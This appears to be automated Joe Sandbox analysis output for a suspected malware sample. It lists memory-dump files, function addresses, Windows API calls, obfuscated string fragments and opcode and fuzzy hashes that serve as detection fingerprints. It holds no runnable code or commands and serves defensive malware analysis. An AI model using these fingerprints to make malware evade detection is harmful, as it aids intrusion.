Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ac243cb4243c48866b75e684ab734d7e213a182afa9db10e2992239335569e14
Instruction ID: d8cd828a78e27c3d6c5529ac82fb9155f5847c16ea5e2966493e9ab4c943aabb
Opcode Fuzzy Hash: ac243cb4243c48866b75e684ab734d7e213a182afa9db10e2992239335569e14
Instruction Fuzzy Hash: F2F0E9B2908109DBD3041F18C8097AEB7D9EF68320F2B422DEA96E3780D675CC004ED6

Function 001C942C Relevance: 1.3, APIs: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 001C9C1B

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 32d05d45f85574a8fe0989de17da4d61a5060c6e1bac7863e0ede63e1a8a374a
Instruction ID: 253a971a6f4982a9049d4ed54bf6ed773249230ff813f2f793faae4df55f3fcb
Opcode Fuzzy Hash: 32d05d45f85574a8fe0989de17da4d61a5060c6e1bac7863e0ede63e1a8a374a
Instruction Fuzzy Hash: 06E039B521C214DFD708AE249488FAEF7E8EB78741F22082ED9C2D7210C3729C409B96

Function 0017DDBB Relevance: 1.3, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 0017DDC4

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: e7e6f92328b4ee4d9f52afb102b73120770ad71ade367ab7ce6cdd11e0ee9c04
Instruction ID: b2fee23cc0d2934a50905171de7aea4590a91ff0de8cd101cfe5aa01da4f93bc
Opcode Fuzzy Hash: e7e6f92328b4ee4d9f52afb102b73120770ad71ade367ab7ce6cdd11e0ee9c04
Instruction Fuzzy Hash: A5C0122426800057C34893349D7253B62678B972483149959C40B81646D760E5458544

Non-executed Functions

Function 00182750 Relevance: 266.3, APIs: 2, Strings: 149, Instructions: 2041COMMON

Download Yara Rule

Strings

l, xrefs: 00183987
J, xrefs: 00183CDA
e, xrefs: 00183CF2
-, xrefs: 00183B7D
, xrefs: 00183C6A
u, xrefs: 00183D72
_, xrefs: 001839A7
8, xrefs: 00183937
r, xrefs: 00183D9A
q, xrefs: 00183D92
1, xrefs: 00183947
E, xrefs: 00182CB1
j, xrefs: 00182F58
o, xrefs: 00183997
%, xrefs: 00184031
m, xrefs: 00183CB2
F, xrefs: 0018395F
W, xrefs: 00183C82
., xrefs: 00183B82
n, xrefs: 00182F38
2, xrefs: 00183403
^, xrefs: 0018435F
), xrefs: 00184011
%, xrefs: 00183C4A
}, xrefs: 00183D32
', xrefs: 00184041
., xrefs: 00183C5A
=, xrefs: 00183C0A
?, xrefs: 00183076
], xrefs: 00184643
^, xrefs: 00183604
=, xrefs: 001834D9
*, xrefs: 00182A6C
0, xrefs: 00183C1A
], xrefs: 00184479
:, xrefs: 00183BDA
], xrefs: 0018360C
y, xrefs: 001834E9
/, xrefs: 00184001
^, xrefs: 00184471
#, xrefs: 00184061
A, xrefs: 00182F30
o, xrefs: 00183CC2
_, xrefs: 00184469
\, xrefs: 0018473E
\, xrefs: 0018464B
/, xrefs: 00183C2A
R, xrefs: 00183D8A
?, xrefs: 00183F81
&, xrefs: 001829D4
X, xrefs: 00183D4A
3, xrefs: 00183FE1
g, xrefs: 00183D02
e, xrefs: 00183C8A
\, xrefs: 00184481
i, xrefs: 00183744
", xrefs: 00184059
<, xrefs: 0018336C
K, xrefs: 00184019
], xrefs: 00183C32
{, xrefs: 00183D62
@, xrefs: 0018394F
E, xrefs: 00183BF2
^, xrefs: 001841EF
a, xrefs: 00183D12
j, xrefs: 00183413
O, xrefs: 00183D5A
\, xrefs: 0018436F
D, xrefs: 00184136
;, xrefs: 00183FA1
G, xrefs: 00183C02
w, xrefs: 00183D82
l, xrefs: 00182F48
i, xrefs: 00183CD2
3, xrefs: 00183BEA
a, xrefs: 0018295D
c, xrefs: 00183D22
\, xrefs: 00183614
B, xrefs: 0018393F
h, xrefs: 00182F68
N, xrefs: 00183FE9
K, xrefs: 00183BE2
^, xrefs: 00184734
/, xrefs: 00183C9A
_, xrefs: 001841E7
D, xrefs: 0018456B
S, xrefs: 00183FC9
=, xrefs: 00183F71
1, xrefs: 00183FD1
Z, xrefs: 0018397F
5, xrefs: 00183FB1
2, xrefs: 00182B1F
], xrefs: 001841F7
y, xrefs: 00183D52
`, xrefs: 00183588
X, xrefs: 0018398F
\, xrefs: 001841FF
A, xrefs: 00183C12
D, xrefs: 00184578
%, xrefs: 00183957
\, xrefs: 001839AF
_, xrefs: 00183C42
v, xrefs: 00183C7A
_, xrefs: 0018472F
;, xrefs: 00183967
7, xrefs: 00183FC1
f, xrefs: 001827B6
9, xrefs: 00183F91
~, xrefs: 00182D99
F, xrefs: 00182F20
H, xrefs: 00182F10
L, xrefs: 0018392F
d, xrefs: 001834B9
_, xrefs: 00184633
k, xrefs: 00182F60
], xrefs: 00184367
Y, xrefs: 00183C52
~, xrefs: 00183433
!, xrefs: 00184051
C, xrefs: 00183C22
_, xrefs: 00184357
6, xrefs: 00182BE4
D, xrefs: 0018396F
m, xrefs: 00183F89
L, xrefs: 00182A71
&, xrefs: 00183C3A
<, xrefs: 001834C9
^, xrefs: 0018463B
9, xrefs: 00183977
s, xrefs: 00183DA2
^, xrefs: 00182D94
<, xrefs: 00182DA3
9, xrefs: 00183927
k, xrefs: 00183CE2
+, xrefs: 00184021
-, xrefs: 00183FF1
;, xrefs: 00182F00
/, xrefs: 00183B87
Y, xrefs: 0018281E
|, xrefs: 00183423
_, xrefs: 001835FC
S, xrefs: 00183CA2
[, xrefs: 00183C62
Q, xrefs: 00183C92
^, xrefs: 0018399F
V, xrefs: 00183D7A
d, xrefs: 00182EF0
], xrefs: 00184739
U, xrefs: 00183C72

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: $!$"$#$%$%$%$&$&$'$)$*$+$-$-$.$.$/$/$/$/$0$1$1$2$2$3$3$5$6$7$8$9$9$9$:$;$;$;$<$<$<$=$=$=$?$?$@$A$A$B$C$D$D$D$D$E$E$F$F$G$H$J$K$K$L$L$N$O$Q$R$S$S$U$V$W$X$X$Y$Y$Z$[$\$\$\$\$\$\$\$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$`$a$a$c$d$d$e$e$f$g$h$i$i$j$j$k$k$l$l$m$m$n$o$o$q$r$s$u$v$w$y$y${$|$}$~$~
API String ID: 0-1985396431
Opcode ID: 69f067038e30327fc82aa8ba3fef2ddd9738dff8f0d94366d326a3e4335820ad
Instruction ID: d7870370153187d2d385cc45db5df5e030005ac9ccdce980529f9ddffae23f2f
Opcode Fuzzy Hash: 69f067038e30327fc82aa8ba3fef2ddd9738dff8f0d94366d326a3e4335820ad
Instruction Fuzzy Hash: 7613B03150C7C18FD335AB3884443AFBFE16B96314F198A6DE4E987382D7B98A458B53

Function 001942D0 Relevance: 39.6, APIs: 2, Strings: 20, Instructions: 1129COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 001943AA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0019443E

Strings

N~4|, xrefs: 0019593E
e>n<, xrefs: 0019588E
uw, xrefs: 00195B57
|r, xrefs: 001953A8
y{, xrefs: 00195B36
+$e, xrefs: 001943FA, 0019442B
<j:h, xrefs: 00195975
r:i8, xrefs: 00195899
DD, xrefs: 00195CEE
ut, xrefs: 00195CE3
+$e, xrefs: 00194365, 0019437A
Xs, xrefs: 00195CD8
tj, xrefs: 001953BE
=?, xrefs: 00195BF1
=:, xrefs: 001957CE
13, xrefs: 00195BFC
%r?p, xrefs: 0019595F
b`, xrefs: 001955F9
gd, xrefs: 00195E60
n l, xrefs: 0019596A

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 237503144-1429676654
Opcode ID: a298c2e3badd56764ffceb753c5641fb9485bf385838d4b13789ef6810f7eb39
Instruction ID: 50b2cd4aba16913ef006cb3c69296f973c770f06d309653f0e8f2b1d539f1696
Opcode Fuzzy Hash: a298c2e3badd56764ffceb753c5641fb9485bf385838d4b13789ef6810f7eb39
Instruction Fuzzy Hash: 93C20CB560C3848AD334CF14C452BDFBAF2FB82304F00892DD5E96B655D7B5864A8B9B

Function 00194560 Relevance: 36.1, APIs: 1, Strings: 19, Instructions: 1081COMMON

Download Yara Rule

Strings

N~4|, xrefs: 0019593E
e>n<, xrefs: 0019588E
uw, xrefs: 00195B57
|r, xrefs: 001953A8
y{, xrefs: 00195B36
+$e, xrefs: 0019442B
<j:h, xrefs: 00195975
r:i8, xrefs: 00195899
DD, xrefs: 00195CEE
ut, xrefs: 00195CE3
Xs, xrefs: 00195CD8
tj, xrefs: 001953BE
=?, xrefs: 00195BF1
=:, xrefs: 001957CE
13, xrefs: 00195BFC
%r?p, xrefs: 0019595F
b`, xrefs: 001955F9
gd, xrefs: 00195E60
n l, xrefs: 0019596A

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 0-3233044194
Opcode ID: 65474226ce45c54be2b533d34b2609e612f045581fbcf49538f55ccc3b381bcc
Instruction ID: 7aa8af41ed692e7ac77f3f1681c238e0f87936766d7e1679f0bec60cd8da3e70
Opcode Fuzzy Hash: 65474226ce45c54be2b533d34b2609e612f045581fbcf49538f55ccc3b381bcc
Instruction Fuzzy Hash: A9C20CB560C3848AD334CF54C452BDFBAF2FB82304F00892DD5E96B655D7B1464A8B9B

Function 001946D0 Relevance: 36.0, APIs: 1, Strings: 19, Instructions: 1047COMMON

Download Yara Rule

Strings

N~4|, xrefs: 0019593E
e>n<, xrefs: 0019588E
uw, xrefs: 00195B57
|r, xrefs: 001953A8
y{, xrefs: 00195B36
+$e, xrefs: 0019442B
<j:h, xrefs: 00195975
r:i8, xrefs: 00195899
DD, xrefs: 00195CEE
ut, xrefs: 00195CE3
Xs, xrefs: 00195CD8
tj, xrefs: 001953BE
=?, xrefs: 00195BF1
=:, xrefs: 001957CE
13, xrefs: 00195BFC
%r?p, xrefs: 0019595F
b`, xrefs: 001955F9
gd, xrefs: 00195E60
n l, xrefs: 0019596A

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 0-3233044194
Opcode ID: 1f3d8a1b15e99a3d84f63fe025b56bad6ae044f67cf1db0bcf315d44a6f656e5
Instruction ID: 37b8d9708769979b7c010c661c1bbdd88f7e9aeb3dcf2bc77986aaed56c3b057
Opcode Fuzzy Hash: 1f3d8a1b15e99a3d84f63fe025b56bad6ae044f67cf1db0bcf315d44a6f656e5
Instruction Fuzzy Hash: CCC20BB560C3848AD334CF18C452BDFBAF2FB82304F00892DD5E96B655D7B5464A8B9B

Function 001A9280 Relevance: 18.2, APIs: 2, Strings: 8, Instructions: 661COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 001A98DF
SysFreeString.OLEAUT32(?), ref: 001A98E5

Strings

b{tu, xrefs: 001A92D9, 001A939B
O^, xrefs: 001A97A6
t"j, xrefs: 001A966E
Jtuj, xrefs: 001A92E5
=hn, xrefs: 001A9676
SB, xrefs: 001A979E
:;$%, xrefs: 001A99C0
gd, xrefs: 001A968E

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: FreeString
String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
API String ID: 3341692771-1335595022
Opcode ID: 12fc9a77ad981e6de7f49f93cfc106d7509a16348a8f16ca7c64df5b3c083630
Instruction ID: c026b7d37af870fc1d9fd065701c57aea180f2cdb7d5004c0d17635329692662
Opcode Fuzzy Hash: 12fc9a77ad981e6de7f49f93cfc106d7509a16348a8f16ca7c64df5b3c083630
Instruction Fuzzy Hash: D7221476A183519BD710CF24C881B5BBBE2EFC6314F28892CE5D49B3A1D779D845CB82

Function 001860E9 Relevance: 17.1, Strings: 13, Instructions: 807COMMON

Download Yara Rule

Strings

*,-", xrefs: 001866EF
JyTK, xrefs: 00186160
L4, xrefs: 00186780
qRb`, xrefs: 00186133
~mfQ, xrefs: 0018613E
w}MI, xrefs: 00186128
uqrs, xrefs: 00186AF0
{zdy, xrefs: 0018611D
L4, xrefs: 00186BA0
t~v:, xrefs: 001861E7
pt}w, xrefs: 001861F2
ntxE, xrefs: 00186112
3F&D, xrefs: 00186273

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
API String ID: 0-2746398225
Opcode ID: 73ef78627eabc210422e4696f164eef9f3e280f2ba758a056f28df03472b61a7
Instruction ID: 85b071d0d539fd7aab41d36252e207e8b4d22a840744592c851c8300a2e0eef4
Opcode Fuzzy Hash: 73ef78627eabc210422e4696f164eef9f3e280f2ba758a056f28df03472b61a7
Instruction Fuzzy Hash: 554225B2A083508FC7249F28D8917ABB7E2FFE5314F198A3CD4D987296D7348945CB42

Function 0017F60D Relevance: 16.6, APIs: 1, Strings: 8, Instructions: 845COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(?), ref: 0017FDFC

Strings

w, xrefs: 0017FAAD
\, xrefs: 0017FB0F
x, xrefs: 0017FBD4
=, xrefs: 0017F978
g, xrefs: 0017F9EA
#, xrefs: 0017F721
m, xrefs: 0017F8F4
6, xrefs: 0017F620

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: #$6$=$\$g$m$w$x
API String ID: 237503144-139252074
Opcode ID: 17405fe042919d871e5826c80a3cf806987bc783ec1ed6fbe82eef8ddd45b18d
Instruction ID: fe9825245e57cface318aa430fdb70c4d8a6bd5e90ce450ef0538a0874841f67
Opcode Fuzzy Hash: 17405fe042919d871e5826c80a3cf806987bc783ec1ed6fbe82eef8ddd45b18d
Instruction Fuzzy Hash: 7C72703261D7908BD328DA38C8553AFBAE2ABD5324F198B2DE4EDC73D5D77489018742

Function 00181227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750COMMON

Download Yara Rule

Strings

), xrefs: 00181A4D
L, xrefs: 00181846
@, xrefs: 001817D0
>, xrefs: 001816FF
+, xrefs: 001817CB
`, xrefs: 001813A4
[, xrefs: 00181555
F, xrefs: 0018184E

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
